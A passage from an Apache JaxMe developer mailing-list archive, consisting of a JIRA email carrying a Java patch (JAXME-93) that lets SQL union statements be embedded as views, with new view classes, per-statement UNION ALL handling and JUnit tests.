private Object data; + private ViewColumnImpl(ColumnReference pColumn) { + col =3D pColumn.getColumn(); + Column.Name alias =3D pColumn.getAlias(); + colName =3D alias =3D=3D null ? col.getName() : alias; + } + public Table getTable() { return SelectCombinationViewImpl.this; } + public Name getName() { return colName; } + public String getQName() { return getTable() + "." + getName(); } + public Type getType() { return col.getType(); } + public boolean isPrimaryKeyPart() { return false; } + public void setNullable(boolean pNullable) { + throw new IllegalStateException("Unable to set a view columns = 'Nullable' property."); + } + public boolean isNullable() { return col.isNullable(); } + public boolean isStringColumn() { return col.isStringColumn(); } + public boolean isBinaryColumn() { return col.isBinaryColumn(); } + public void setCustomData(Object pData) { data =3D pData; } + public Object getCustomData() { return data; } + public boolean isVirtual() { return false; } + } + + public Iterator getColumns() { + List result =3D new ArrayList(); + for (Iterator iter =3D getFirstStatement(statement).getResultColum= ns(); iter.hasNext(); ) { + ColumnReference col =3D (ColumnReference) iter.next(); + result.add(new ViewColumnImpl(col)); + } + return result.iterator(); + } + + public Column getColumn(Column.Name pName) { + if (pName =3D=3D null) { + throw new NullPointerException("Column names must not be null.= "); + } + for (Iterator iter =3D getFirstStatement(statement).getResultColum= ns(); iter.hasNext(); ) { + ColumnReference col =3D (ColumnReference) iter.next(); + Column.Name alias =3D col.getAlias(); + if (alias =3D=3D null) { + =09alias =3D col.getColumn().getName(); + } + if (alias.equals(pName)) { + return new ViewColumnImpl(col); + } + } + return null; + } +=09 + public Column newColumn(Column.Name pName, Type pType) { + throw new IllegalStateException("A views columns cannot be changed= ."); + } + + public Column newColumn(String pName, Type pType) { + throw new IllegalStateException("A views columns cannot be changed= ."); + } + + public Index newKey() { + throw new IllegalStateException("A view cannot have keys."); + } + public Index newIndex() { + throw new IllegalStateException("A view cannot have indexes."); + } + public Index newPrimaryKey() { + throw new IllegalStateException("A view cannot have a primary key.= "); + } + public ForeignKey newForeignKey(Table pReferencedTable) { + throw new IllegalStateException("A view cannot have foreign keys."= ); + } + public InsertStatement getInsertStatement() { + throw new IllegalStateException("A view is not updateable."); + } + public UpdateStatement getUpdateStatement() { + throw new IllegalStateException("A view is not updateable."); + } + public DeleteStatement getDeleteStatement() { + throw new IllegalStateException("A view is not updateable."); + } + public Index getPrimaryKey() { + throw new IllegalStateException("A view cannot have a primary key.= "); + } + public Iterator getIndexes() { + throw new IllegalStateException("A view cannot have indexes."); + } + public Iterator getForeignKeys() { + throw new IllegalStateException("A view cannot have foreign keys."= ); + } + +} Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/impl/ObjectFactoryImpl.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/ObjectFactoryImpl.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/ObjectFactoryImpl.java=09(working copy) @@ -32,6 +32,7 @@ import org.apache.ws.jaxme.sqls.Table; import org.apache.ws.jaxme.sqls.TableReference; import org.apache.ws.jaxme.sqls.CombinedConstraint.Type; +import org.apache.ws.jaxme.sqls.Table.Name; =20 =20 /** <p>Default implementation of the object factory.</p> @@ -58,6 +59,12 @@ public Table newView(SelectStatement pSelectStatement, Table.Name pNam= e) { return new ViewImpl(pSelectStatement, pName); } +=09 + public Table newView( +=09=09=09SelectCombinationStatementImpl selectCombinationStatementImpl, +=09=09=09Name name) { +=09=09return new SelectCombinationViewImpl(selectCombinationStatementImpl,= name); +=09} =20 public CombinedConstraint newCombinedConstraint(ConstrainedStatement p= Statement, Type pType) { return new CombinedConstraintImpl(pStatement, pType); @@ -74,4 +81,5 @@ =09public Expression createExpression(Statement pStatement, org.apache.ws.= jaxme.sqls.Expression.Type pType) { =09=09return new ExpressionImpl(pStatement, pType); =09} + } Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/impl/SQLGeneratorImpl.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/SQLGeneratorImpl.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/SQLGeneratorImpl.java=09(working copy) @@ -592,6 +592,9 @@ if (t instanceof ViewImpl) { ViewImpl v =3D (ViewImpl) t; tableName =3D "(" + getSelectQuery(v.getViewStatement(), pData= ) + ")"; + } else if (t instanceof SelectCombinationViewImpl) { + =09SelectCombinationViewImpl view =3D (SelectCombinationViewImpl) = t; + =09tableName =3D "(" + getQuery(view.getSelectCombinationStatement= ()) + ")"; } else { tableName =3D pTable.getTable().getQName(); } @@ -1034,6 +1037,11 @@ checkSameStructure(first, other); sb.append(' '); sb.append(pSep); + if(pStatement instanceof UnionStatement) { + =09if(((UnionStatement)pStatement).isAll(other)){ + sb.append(" ALL"); + =09} + }; sb.append(" ("); sb.append(getQuery(other)); sb.append(')'); @@ -1052,9 +1060,7 @@ } else if (pStatement instanceof SelectStatement) { s =3D getSelectQuery((SelectStatement) pStatement); } else if (pStatement instanceof UnionStatement) { - final UnionStatement us =3D (UnionStatement) pStatement; - final boolean all =3D us.isAll(); - s =3D getSelectCombinationStatement(us, all ? "UNION ALL" : "U= NION"); + s =3D getSelectCombinationStatement((UnionStatement) pStatemen= t, "UNION"); } else if (pStatement instanceof IntersectionStatement) { s =3D getSelectCombinationStatement((IntersectionStatement) pS= tatement, "INTERSECT"); } else if (pStatement instanceof MinusStatement) { Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/impl/UnionStatementImpl.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/UnionStatementImpl.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/UnionStatementImpl.java=09(working copy) @@ -1,6 +1,9 @@ package org.apache.ws.jaxme.sqls.impl; =20 +import java.util.HashMap; + import org.apache.ws.jaxme.sqls.SQLFactory; +import org.apache.ws.jaxme.sqls.SelectStatement; import org.apache.ws.jaxme.sqls.UnionStatement; =20 =20 @@ -8,17 +11,28 @@ * Default implementation of {@link UnionStatement}. */ public class UnionStatementImpl extends SelectCombinationStatementImpl imp= lements UnionStatement { - private boolean all; - =20 +=09private final HashMap all =3D new HashMap();=20 +=09private boolean first =3D true; +=09 protected UnionStatementImpl(SQLFactory pFactory) { super(pFactory); } =20 - public boolean isAll() { - return all; - } +=09public void addStatement(SelectStatement statement, boolean pAll) { +=09=09if(first && pAll){ +=09=09=09throw new IllegalArgumentException(" pAll=3Dtrue for first Statem= ent is not allowed"); +=09=09} +=09=09super.addStatement(statement); +=09=09all.put(statement,new Boolean(pAll)); +=09=09first =3D false; +=09} +=09 +=09public void addStatement(SelectStatement statement) { +=09=09addStatement(statement,false); +=09} =20 - public void setAll(boolean pAll) { - all =3D pAll; - } +=09public boolean isAll(SelectStatement statement) { +=09=09return ((Boolean)all.get(statement)).booleanValue(); +=09} + } Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/SelectCombinationStatement.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/SelectCombinationStatement.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/SelectCombinationStatement.java=09(working copy) @@ -7,10 +7,9 @@ * Common base interface for {@link UnionStatement}, and * {@link IntersectionStatement}. */ -public interface SelectCombinationStatement extends Statement { +public interface SelectCombinationStatement extends Statement, ViewableSta= tement { /** - * Adds a select statement to the given "union", or - * "intersection" statement. + * Adds a select statement to the given "union", "intersection", or "m= inus" statement. */ void addStatement(SelectStatement pStatement); =20 @@ -18,4 +17,5 @@ * Returns an iterator over all the select statements. */ Iterator getSelectStatements(); + } Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/ObjectFactory.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/ObjectFactory.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/ObjectFactory.java=09(working copy) @@ -16,6 +16,8 @@ package org.apache.ws.jaxme.sqls; =20 import org.apache.ws.jaxme.sqls.Expression.Type; +import org.apache.ws.jaxme.sqls.Table.Name; +import org.apache.ws.jaxme.sqls.impl.SelectCombinationStatementImpl; =20 =20 /** A factory object for creating all the objects used by @@ -46,6 +48,16 @@ */ public Table newView(SelectStatement pSelectStatement, Table.Name pNam= e); =20 + /** Returns an instance of + * {@link org.apache.ws.jaxme.sqls.Table}, which allows to embed + * the given instance of + * {@link org.apache.ws.jaxme.sqls.SelectCombinationStatement} into an= other + * SELECT statement. + */ + public Table newView( +=09=09=09SelectCombinationStatementImpl selectCombinationStatementImpl, +=09=09=09Name name); + /** Creates a new instance of * {@link org.apache.ws.jaxme.sqls.Constraint} constraining * the given {@link org.apache.ws.jaxme.sqls.ConstrainedStatement}. @@ -64,4 +76,5 @@ =09/** Creates a new instance of {@link Expression}. =09 */ =09public Expression createExpression(Statement pStatement, Type sum); + } Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/SelectStatement.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/SelectStatement.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/SelectStatement.java=09(working copy) @@ -23,7 +23,7 @@ * * @author <a href=3D"mailto:[email protected]">Jochen Wiedmann</a> */ -public interface SelectStatement extends ConstrainedStatement { +public interface SelectStatement extends ConstrainedStatement,ViewableStat= ement { =09/** Provides a single column for an <code>ORDER BY</code> * clause. =09 */ @@ -111,14 +111,4 @@ */ public int getSkippedRows(); =20 - /** <p>Creates a view, which may be used to embed the statement into - * a separate query.</p> - */ - public Table createView(Table.Name pName); - - - /** <p>Creates a view, which may be used to embed the statement into - * a separate query.</p> - */ - public Table createView(String pName); } Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/junit/CreateTest.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/junit/CreateTest.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/junit/CreateTest.java=09(working copy) @@ -458,7 +458,7 @@ =09=09assertEquals(expect, got); =09} =20 -=09/** Test for UNION and UNION ALL. +=09/** Test for UNION. =09 */ =09public void testUnion() { UnionStatement us =3D getSQLFactory().newUnionStatement(); @@ -467,7 +467,23 @@ String got =3D gen.getQuery(us); String expect =3D "(SELECT MyIndex, MyName, MyDate FROM MySchema.M= yTable WHERE 'MyIndex'>5) UNION (SELECT MyIndex, MyName, MyDate FROM MySche= ma.MyTable WHERE 'MyName' LIKE 'x%')"; assertEquals(expect, got); - us.setAll(true); +=09} +=09/** Test for UNION ALL. +=09 */ +=09public void testUnionAll() { + UnionStatement us =3D getSQLFactory().newUnionStatement(); +=09 Table t =3D getBasicTable(); +=09=09SelectStatement st1 =3D t.getSelectStatement(); +=09=09SelectStatement st2 =3D t.getSelectStatement(); +=09=09BooleanConstraint bc1 =3D st1.getWhere().createGT(); +=09=09bc1.addPart("MyIndex"); +=09=09bc1.addPart(5); +=09=09BooleanConstraint bc2 =3D st2.getWhere().createLIKE(); +=09=09bc2.addPart("MyName"); +=09=09bc2.addPart("x%"); +=09=09us.addStatement(st1); +=09=09us.addStatement(st2,true); + SQLGenerator gen =3D getSQLGenerator(); String gotAll =3D gen.getQuery(us); String expectAll =3D "(SELECT MyIndex, MyName, MyDate FROM MySchem= a.MyTable WHERE 'MyIndex'>5) UNION ALL (SELECT MyIndex, MyName, MyDate FROM= MySchema.MyTable WHERE 'MyName' LIKE 'x%')"; assertEquals(expectAll, gotAll); @@ -516,4 +532,21 @@ // Ok } } + +=09/** Test for UNION and UNION ALL. +=09 */ +=09public void testUnionView() { + UnionStatement us =3D getSQLFactory().newUnionStatement(); +=09 createSelectCombinationStatement(us); +=09 Table view =3D us.createView((String)null); +=09 // SelectStatemnt st =3D SELECT * FROM view ... +=09 SelectStatement st =3D getSQLFactory().newSelectStatement(); +=09 st.setTable(view); +=09 =20 +=09 SQLGenerator gen =3D getSQLGenerator(); + String got =3D gen.getQuery(st); + String expect =3D "SELECT * FROM ((SELECT MyIndex, MyName, MyDate = FROM MySchema.MyTable WHERE 'MyIndex'>5) UNION (SELECT MyIndex, MyName, MyD= ate FROM MySchema.MyTable WHERE 'MyName' LIKE 'x%'))"; + assertEquals(expect, got); +=09} + } Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/UnionStatement.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/UnionStatement.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/UnionStatement.java=09(working copy) @@ -6,14 +6,15 @@ */ public interface UnionStatement extends SelectCombinationStatement { /** + * Adds a select statement to the given "union", "intersection", or "m= inus" statement. * Sets, whether this is a "union all" statement. By default, * it isn't. */ - void setAll(boolean pAll); - + void addStatement(SelectStatement pStatement,boolean all); + =20 /** - * Returns, whether this is a "union all" statement. By default, - * it isn't. + * is 'union all' Statement */ - boolean isAll(); + boolean isAll(SelectStatement pStatement); + } Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/ViewableStatement.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/ViewableStatement.java=09(revision 0) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/ViewableStatement.java=09(revision 0) @@ -0,0 +1,18 @@ +package org.apache.ws.jaxme.sqls; + +/** + * this interface describe the potential use as view for a statement + */ +public interface ViewableStatement { + +=09/** <p>Creates a view, which may be used to embed the statement into +=09 * a separate query.</p> +=09 */ +=09public abstract Table createView(Table.Name pName); + +=09/** <p>Creates a view, which may be used to embed the statement into +=09 * a separate query.</p> +=09 */ +=09public abstract Table createView(String pName); + +} \ No newline at end of file --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Aug 20 13:57:58 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17375 invoked from network); 20 Aug 2007 13:57:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2007 13:57:55 -0000 Received: (qmail 33373 invoked by uid 500); 20 Aug 2007 13:57:52 -0000 Delivered-To: [email protected] Received: (qmail 33353 invoked by uid 500); 20 Aug 2007 13:57:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 33329 invoked by uid 99); 20 Aug 2007 13:57:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 06:57:52 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 13:57:51 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1E7F3714218 for <[email protected]>; Mon, 20 Aug 2007 06:57:31 -0700 (PDT) Message-ID: <5886302.1187618251122.JavaMail.jira@brutus> Date: Mon, 20 Aug 2007 06:57:31 -0700 (PDT) From: =?utf-8?Q?Tobias_H=C3=BChner_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Updated: (JAXME-93) union statements as views In-Reply-To: <30884052.1187618131650.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JAXME-93?page=3Dcom.atlassian.= jira.plugin.system.issuetabpanels:all-tabpanel ] Tobias H=C3=BChner updated JAXME-93: ------------------------------- Attachment: view_Jaxme.patch patch > union statements as views > ------------------------- > > Key: JAXME-93 > URL: https://issues.apache.org/jira/browse/JAXME-93 > Project: JaxMe > Issue Type: Improvement > Components: JaxMeJS > Reporter: Tobias H=C3=BChner > Attachments: view_Jaxme.patch > > > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/impl/SelectCombinationStatementImpl.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/SelectCombinationStatementImpl.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/SelectCombinationStatementImpl.java=09(working copy) > @@ -7,6 +7,7 @@ > import org.apache.ws.jaxme.sqls.SQLFactory; > import org.apache.ws.jaxme.sqls.SelectCombinationStatement; > import org.apache.ws.jaxme.sqls.SelectStatement; > +import org.apache.ws.jaxme.sqls.Table; > =20 > =20 > /** > @@ -24,6 +25,17 @@ > } > =20 > public Iterator getSelectStatements() { > - return statements.iterator(); > + if(statements.isEmpty()){ > +=09=09=09throw new IllegalStateException("No Statement defined");=20 > + } > + =09return statements.iterator(); > } > + =20 > +=09public Table createView(Table.Name pName) { > +=09=09return getSQLFactory().getObjectFactory().newView(this,pName); > +=09} > + > +=09public Table createView(String pName) { > +=09 return createView(pName =3D=3D null ? null : new TableImpl.NameIm= pl(pName)); > +=09} > } > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/impl/SelectCombinationViewImpl.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/SelectCombinationViewImpl.java=09(revision 0) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/SelectCombinationViewImpl.java=09(revision 0) > @@ -0,0 +1,126 @@ > +package org.apache.ws.jaxme.sqls.impl; > + > + > +import java.util.ArrayList; > +import java.util.Iterator; > +import java.util.List; > + > +import org.apache.ws.jaxme.sqls.Column; > +import org.apache.ws.jaxme.sqls.ColumnReference; > +import org.apache.ws.jaxme.sqls.DeleteStatement; > +import org.apache.ws.jaxme.sqls.ForeignKey; > +import org.apache.ws.jaxme.sqls.Index; > +import org.apache.ws.jaxme.sqls.InsertStatement; > +import org.apache.ws.jaxme.sqls.SelectCombinationStatement; > +import org.apache.ws.jaxme.sqls.SelectStatement; > +import org.apache.ws.jaxme.sqls.Table; > +import org.apache.ws.jaxme.sqls.UpdateStatement; > +import org.apache.ws.jaxme.sqls.Column.Type; > + > +public class SelectCombinationViewImpl extends TableImpl implements Tabl= e { > +=09private final SelectCombinationStatement statement; > + > +=09protected SelectCombinationViewImpl(SelectCombinationStatement pState= ment, Name pName) { > +=09=09super((getFirstStatement(pStatement)).getTableReference().getTable= ().getSchema(), > +=09=09=09=09pName =3D=3D null ? (getFirstStatement(pStatement)).getTable= Reference().getTable().getName() : pName); > +=09=09statement =3D pStatement; > +=09} > + > +=09private static SelectStatement getFirstStatement(SelectCombinationSta= tement pStatement) { > +=09=09return (SelectStatement)pStatement.getSelectStatements().next(); > +=09} > + > +=09public final SelectCombinationStatement getSelectCombinationStatement= () { > +=09=09return statement; > +=09} > + private class ViewColumnImpl implements Column { > + private final Column.Name colName; > + private final Column col; > + private Object data; > + private ViewColumnImpl(ColumnReference pColumn) { > + col =3D pColumn.getColumn(); > + Column.Name alias =3D pColumn.getAlias(); > + colName =3D alias =3D=3D null ? col.getName() : alias; > + } > + public Table getTable() { return SelectCombinationViewImpl.this;= } > + public Name getName() { return colName; } > + public String getQName() { return getTable() + "." + getName(); = } > + public Type getType() { return col.getType(); } > + public boolean isPrimaryKeyPart() { return false; } > + public void setNullable(boolean pNullable) { > + throw new IllegalStateException("Unable to set a view column= s 'Nullable' property."); > + } > + public boolean isNullable() { return col.isNullable(); } > + public boolean isStringColumn() { return col.isStringColumn(); } > + public boolean isBinaryColumn() { return col.isBinaryColumn(); } > + public void setCustomData(Object pData) { data =3D pData; } > + public Object getCustomData() { return data; } > + public boolean isVirtual() { return false; } > + } > + > + public Iterator getColumns() { > + List result =3D new ArrayList(); > + for (Iterator iter =3D getFirstStatement(statement).getResultCol= umns(); iter.hasNext(); ) { > + ColumnReference col =3D (ColumnReference) iter.next(); > + result.add(new ViewColumnImpl(col)); > + } > + return result.iterator(); > + } > + > + public Column getColumn(Column.Name pName) { > + if (pName =3D=3D null) { > + throw new NullPointerException("Column names must not be nul= l."); > + } > + for (Iterator iter =3D getFirstStatement(statement).getResultCol= umns(); iter.hasNext(); ) { > + ColumnReference col =3D (ColumnReference) iter.next(); > + Column.Name alias =3D col.getAlias(); > + if (alias =3D=3D null) { > + =09alias =3D col.getColumn().getName(); > + } > + if (alias.equals(pName)) { > + return new ViewColumnImpl(col); > + } > + } > + return null; > + } > +=09 > + public Column newColumn(Column.Name pName, Type pType) { > + throw new IllegalStateException("A views columns cannot be chang= ed."); > + } > + > + public Column newColumn(String pName, Type pType) { > + throw new IllegalStateException("A views columns cannot be chang= ed."); > + } > + > + public Index newKey() { > + throw new IllegalStateException("A view cannot have keys."); > + } > + public Index newIndex() { > + throw new IllegalStateException("A view cannot have indexes."); > + } > + public Index newPrimaryKey() { > + throw new IllegalStateException("A view cannot have a primary ke= y."); > + } > + public ForeignKey newForeignKey(Table pReferencedTable) { > + throw new IllegalStateException("A view cannot have foreign keys= ."); > + } > + public InsertStatement getInsertStatement() { > + throw new IllegalStateException("A view is not updateable."); > + } > + public UpdateStatement getUpdateStatement() { > + throw new IllegalStateException("A view is not updateable."); > + } > + public DeleteStatement getDeleteStatement() { > + throw new IllegalStateException("A view is not updateable."); > + } > + public Index getPrimaryKey() { > + throw new IllegalStateException("A view cannot have a primary ke= y."); > + } > + public Iterator getIndexes() { > + throw new IllegalStateException("A view cannot have indexes."); > + } > + public Iterator getForeignKeys() { > + throw new IllegalStateException("A view cannot have foreign keys= ."); > + } > + > +} > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/impl/ObjectFactoryImpl.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/ObjectFactoryImpl.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/ObjectFactoryImpl.java=09(working copy) > @@ -32,6 +32,7 @@ > import org.apache.ws.jaxme.sqls.Table; > import org.apache.ws.jaxme.sqls.TableReference; > import org.apache.ws.jaxme.sqls.CombinedConstraint.Type; > +import org.apache.ws.jaxme.sqls.Table.Name; > =20 > =20 > /** <p>Default implementation of the object factory.</p> > @@ -58,6 +59,12 @@ > public Table newView(SelectStatement pSelectStatement, Table.Name pN= ame) { > return new ViewImpl(pSelectStatement, pName); > } > +=09 > + public Table newView( > +=09=09=09SelectCombinationStatementImpl selectCombinationStatementImpl, > +=09=09=09Name name) { > +=09=09return new SelectCombinationViewImpl(selectCombinationStatementImp= l,name); > +=09} > =20 > public CombinedConstraint newCombinedConstraint(ConstrainedStatement= pStatement, Type pType) { > return new CombinedConstraintImpl(pStatement, pType); > @@ -74,4 +81,5 @@ > =09public Expression createExpression(Statement pStatement, org.apache.w= s.jaxme.sqls.Expression.Type pType) { > =09=09return new ExpressionImpl(pStatement, pType); > =09} > + > } > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/impl/SQLGeneratorImpl.java > 